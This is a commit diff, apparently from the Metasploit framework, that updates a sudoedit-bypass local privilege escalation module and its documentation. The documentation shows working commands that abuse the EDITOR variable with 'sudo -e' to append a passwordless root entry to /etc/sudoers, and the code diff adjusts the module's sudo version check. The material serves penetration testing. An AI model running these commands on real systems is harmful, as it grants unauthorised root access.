sudoedit work

h00die · May 2, 2023 · 95562e0 · 95562e0
1 parent d454b2e
commit 95562e0
Show file tree

Hide file tree

Showing 2 changed files with 21 additions and 6 deletions.
diff --git a/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md b/documentation/modules/exploit/linux/local/sudoedit_bypass_priv_esc.md
@@ -28,14 +28,22 @@ We also add a flag at the end of our entry after a `#` (comment) for ease of era
 Next we execute out payload, launching it through our shell.
 
 Many of the PoCs work via user input where you have to manually edit `/etc/sudoers`. Obviously this strategy
-won't work with metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
+won't work with Metasploit, as we need to automate it. Early attempts tried to script `vi` into performing
 the write and quite command, similar to:
 `EDITOR="vi -c ':$' -c ':s/$/\\ruser ALL=(ALL:ALL) ALL/' -c ':wq'  -c ':q' -- /etc/sudoers" sudo -e /etc/motd`
 However, the command didn't do well with newlines and escaping.
 
 `sed` however is a valid editor, so it was relatively trivial to script out adding the new entry via sed:
 ```EDITOR="sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: ALL' -- /etc/sudoers" sudo -e /etc/motd```
 
+#### Fedora 21
+
+```
+[*] Executing command: EDITOR="sed -i -e '$ a fedora ALL=(ALL:ALL) NOPASSWD: /bin/sh # ZMoAqOkBfR9e' -- /etc/sudoers" sudo -S -e /etc/passwd
+[*] sed: -e expression #1, char 1: unknown command: `''
+```
+
+
 ### Install
 
 On Ubuntu 22.04:

diff --git a/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb b/modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb
@@ -91,11 +91,18 @@ def get_editable_file
   end
 
   def check
-    # Check the app is installed and the version
-    package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
-    package = package.split(' ')[2] # ii, package name, version, arch
     sys_info = get_sysinfo
-    ver_no = Rex::Version.new(package)
+
+    # Check the app is installed and the version
+    if sys_info['distro'] == 'ubuntu' || sys_info['distro'] == 'debian'
+      package = cmd_exec('dpkg -l sudo | grep \'^ii\'')
+      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
+      ver_no = Rex::Version.new(package)
+    else
+      package = cmd_exec('sudo --version')
+      package = package.split(' ')[2] # ii, package name, version, arch for debian, or Sudo version XXX for other
+      ver_no = Rex::Version.new(package)
+    end
 
     # according to CVE listing, but so much backporting...
     minimal_version = '1.8.0'
@@ -136,7 +143,7 @@ def check
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
     end
 
     if get_editable_file.nil?